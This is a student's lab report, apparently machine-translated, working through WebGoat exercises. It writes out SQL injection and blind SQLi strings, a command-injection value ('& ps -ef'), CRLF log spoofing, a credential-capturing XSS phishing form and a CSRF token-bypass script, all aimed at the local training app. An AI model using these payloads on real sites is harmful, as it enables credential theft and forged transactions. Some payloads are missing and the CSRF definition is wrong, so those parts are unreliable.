2017-2018-2 20155315 "Network countermeasure Technology" Exp9:web Security Foundation

Experimental purpose

Understand the fundamentals of commonly used network attack techniques.

• Tutorial 1
• Tutorial 2
• Tutorial 3

Experimental content

• SQL injection attacks
• XSS attack
• CSRF attack

Experimental Steps Webgoat Preparation

• Download the jar package from GitHub
• Copy to local, and use the command to java -jar webgoat-container-7.0.1-war-exec.jar run the webgoat, the presence INFO: Starting ProtocolHandler ["http-bio-8080"] is successful, you can see the use of 8080 ports, the experimental process can not shut down the terminal
• Open Browser input 127.0.0.1:8080/WebGoat , login with default name and password
• In Webgoat, solution is the answer, hints is a hint. Opening the interface, you can see a series of courses.
• There will be a small tick for every course you complete.

(i) SQL injection attacks

Choose Injection Flaws Start Practice

Command injection: Injection

Command injection attacks are a serious threat to any parameter-driven site.

• View hints: Using system commands to get the contents of a file
• This means that the operation is to inject commands into the operating system
• ps -efFor example, get process information
• We add our command to the source code of the page: "Backdoors.help" is found in the sources, followed by"& ps -ef
• After saving the drop-down box you can see the options we just modified, click view , you can see the process information

Digital injection: Numeric SQL Injection

• You can see that an SQL statement is displayed in the given interface, SELECT * FROM weather_data WHERE station = ? using digital SQL injection, which can be added after the options in the source code of the Web page or 1=1 , so that you can get weather information for all regions.
• You can also use Purpsutie to grasp the repair parameters.
• Open Purpsuite, click Proxy Options Add Add a listening port, add a successful run
• In the browser, preferences click Advanced Network Connection settings Manual proxy configuration: ------set to the port number you just bound.
• Then click Go on the previous course page, and Proxy Intercept you can see the captured package in purpsuite->
• Right- send to repeater Click to Repeater See Station Params value is 101, modified to "101 or 1=1", click Go, then click Intercept is on , you can see the weather information to show all regions

Log spoofing: Log Spoofing

• As the name implies, is to add false log information to confuse the operating system, the purpose is to let the user name "admin" successful login.
• In the user name Input zyl%0d%0aLogin Succeeded for username: admin ,%0d is a space and%0a is a newline
• Click Login appears two lines, one line prompts Zyl login failed, another line prompts admin login success, this information will be saved to the log.

String injection: String SQL injection

The following table allows users to view their credit card numbers. Attempts to inject an SQL string, causing all credit card numbers to be displayed. Try the username "Smith".

• As with the digital type, our goal is to construct a perpetual, because the string is made up in the database ‘ , and we enter Smith‘ OR ‘1‘=‘1 all the user information in last name to be output

Lab stage1:string SQL Injection

• The goal is to log in to the account without knowing the password Neville
• In the Password box, enter‘ or 1=1 --
• Login failed, view Web page source code, found that the password box has a length limit. Change the length to 20 and try again to succeed.

Lab Stage3:numeric SQL Injection

• The purpose is to log in with the employee's account and browse the boss's account
• First login with Larry's account, use ‘ or 1=1 -- as password
• Click ViewProfile to see the user information, then we have to do is click on this button to jump to the boss information.
• View the page source code, you can see the index is based on the employee ID, but we do not know the boss's ID what to do? The database can use sorting to filter the information, and the boss generally pay the highest, the ID value is changed to101 or 1=1 order by salary desc --

Data back door: Database backdoors

• As prompted, enter ID 101
• We can see that the string inserted into the query statement has not been processed, you can enter more than one statement to add, delete, change, check

Digital Blind injection: Blind Numeric SQL Injection

• The goal is to know the pin in the pins table value, first try to 101 AND ((SELECT pin FROM pins WHERE cc_number=‘1111222233334444‘) > 100 ); see whether the pin value is greater than 100, the display number is legal, and then 500, 1000, 5000 try to find that the pin should be less than 5000
• Continuous testing with the dichotomy to find a pin of 2364

String Blind injection: Blind string SQL Injection

• The goal is still to know the value of the pin
• Input 101 AND (SUBSTRING((SELECT name FROM pinsWHERE cc_number=’4321432143214321′), 1, 1) < ‘H’ ); Error, change 1 to 2 101 AND (SUBSTRING((SELECT name FROM pinsWHERE cc_number=’4321432143214321′), 2, 1) < ‘H’ ); , keep trying, result for Jill

(ii) XSS attacks

Choose Cross-Site Scripting (XSS) Start Practice

Phishing xss:phishing with XSS

With XSS and HTML insertion, your goal is to:
Insert HTML into the request credential, add JavaScript to actually collect the credentials, send the credentials to the http://localhost:8080/WebGoat/catcher?PROPERTY=yes ..., to pass this course, the voucher must be published to the capture servlet.

• Upon request, we write code to design a simple login interface to get the username and password and send it to the specified place

  <script>function log(){ alert("Had this been a real attack... Your credentials were juststolen. User Name = " + document.forms[1].user.value + "Password =" + document.forms[1].pass.value); XSSImage=new Image(); XSSImage.src="catcher?PROPERTY=yes&user="+document.forms[1].user.value+ "&password=" + document.forms[1].pass.value + "";}</script><form><br><br><HR><H3>This featurerequires account login:</H3 ><br><br>EnterUsername:<br><input type="text" id="user"name="user"><br>Enter Password:<br><inputtype="password" name = "pass"><br><inputtype="button" name="login" value="login" onclick="log()"></form><br><br><HR>

• Click Search, see Below a login screen, login prompt

Storage-type XSS attack: Stored XSS Attacks

• This attack is common in the Forum and other message platform, the user when the message entered a paragraph of JavaScript script, this script will be saved in the database. Because it is a message, any user who opens the Web page will be taken out of the database to run the script.
• According to the topic request, enter in the message board<script>alert("You‘ve been attacked!!!");</script>
• Other user login interface when clicked just submitted the message, the box prompt

Reflective XSS attack: reflected XSS Attacks

When the request is made, the XSS code appears in the URL, submits as input to the server side, the server-side resolves the response, and XSS is returned to the browser with the response content, and finally the browser resolves the XSS code

• Just as the previous experiment entered the code directly in the input box, the reflected XSS is not persistent, and the JavaScript script entered during the submission to the background is executed
• Also enter the popup code <script>alert("You‘ve been attacked!!!");</script> , click on the purse page to give feedback

(iii) CSRF attack cross-site scripting attack: Crossing site Request Forgery

Your goal is to send an e-mail message to the newsgroup. The e-mail message contains an image whose URL points to a malicious request. In this lesson, the URL should point to the attack servlet, which contains the screen and menu parameters for the course, plus an extra parameter, transferfunds (such as 5000), with any number. You can find the "screen" to construct the link "and" menu "values on the right side of the parameter insertion. The recipient of the CSRF email that was authenticated at that time will transfer the funds.

• In other words, to send an email with a malicious image, the purpose is to turn the user's money away.
• Enter in the message box , and successfully see a little green on the left side Yes
• You can view the values of Creen and menu in the parameters below the current page

XSS boost: CSRF Prompt By-Pass

• Almost as much as the previous experiment, a task to confirm the transfer.

• Input code

• Click Submit, view message, transfer and confirm

CSRF token attack: CSRF token By-Pass

Similar to the CSRF course, your goal is to send e-mail messages to newsgroups that contain malicious requests to transfer funds. To complete successfully, you need to obtain a valid request token. The page that provides the money transfer form contains a valid request token. The URL of the transfer funds page is the "attack" servlet for the "screen" and "menu" Query parameters of this course as well as the additional parameters "Transferfunds = Main". Load this page, read the token, and attach a token to the forged request to transfer the data. When you think the attack is successful, refresh the page, and you'll find the green check in the left menu.

• Based on the previous experiment, using tokens to transfer data

• Input code

  <script>var readToken = function(){var doc = document.getElementById("frame1").contentDocumentvar token = doc.getElementsByName("CSRFToken")[0].getAttribute("value");alert(token);var frame2 = document.getElementById("frame2");frame2.src = "attack?Screen=277&menu=900&transferFunds=4000&CSRFToken="+token;}</script><iframe id="frame2" ></iframe><iframe id="frame1" onload="readToken()" src="attack?Screen=277&menu=900&transferFunds=main" ></iframe>

• Follow the previous steps

Experimental questions answered

• SQL injection attack principle, how to defend
  • The program directly inserts the query statement without judging the legality of the user's input data, and the attacker can add additional SQL statements or use comment characters to get additional information
    • Processing of input strings, screening for special characters
    • Normal user and system administrator user's permission to have the strict distinction
• The principle of XSS attack, how to defend
  • The user enters the JavaScript code in the input box, submits the time directly executes, has the method obtains the website the cookie
    • Special character detection when form is submitted
    • Limit the length of the input box
    • Filtering data in the background
• CSRF attack principle, how to defend
  • CSRF is a cross-site scripting attack that executes an attacker's script in the user's browser to obtain information such as its cookie. A web site that typically has an XSS vulnerability is also most likely to have a csrf vulnerability.
    • Use token: Each page contains a token generated by the Web server, when submitted, the token is also submitted to the server, the server to determine, if the token is not correct, the location of the CSRF attack.
    • Change the submission method to post
    • Regularly clean cookies
    • Verify the values in the form using random numbers

Experimental summary

It was the last experiment, and it was a very fulfilling feeling to be done. Every time after the experiment has been wanted to practice a bit more deeply, but also particularly afraid of their skills are not fine, this experiment provides a platform that allows us to practice at any time, but also through examples let us in peacetime life can pay more attention to the details of vulnerable to attack.

Resources

• Webgoat Practical Guide

2017-2018-2 20155315 "Cyber confrontation Technology" Exp9:web security fundamentals